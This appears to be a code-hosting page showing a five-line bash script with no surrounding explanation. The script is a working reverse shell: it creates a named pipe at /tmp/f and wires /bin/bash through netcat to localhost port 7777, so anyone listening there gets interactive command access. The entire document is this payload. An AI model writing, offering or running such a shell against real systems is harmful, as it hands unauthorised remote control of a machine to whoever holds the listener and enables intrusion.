2023-04-12 00:25:33 +02:00

5 lines
88 B
Bash

#!/bin/bash
mkfifo /tmp/f
/bin/bash 0</tmp/f | nc localhost 7777 1>/tmp/f && rm /tmp/f